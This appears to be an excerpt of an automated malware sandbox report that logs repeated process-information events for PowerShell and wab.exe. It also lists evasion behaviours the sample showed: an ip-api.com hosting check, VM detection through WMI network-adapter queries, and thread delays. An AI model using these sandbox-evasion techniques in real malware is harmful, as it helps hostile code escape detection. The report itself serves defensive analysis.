            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 25BE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 25B20000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599654Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599436Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599324Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599217Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598873Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598644Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598218Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597997Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597670Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597557Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597125Jump to behavior
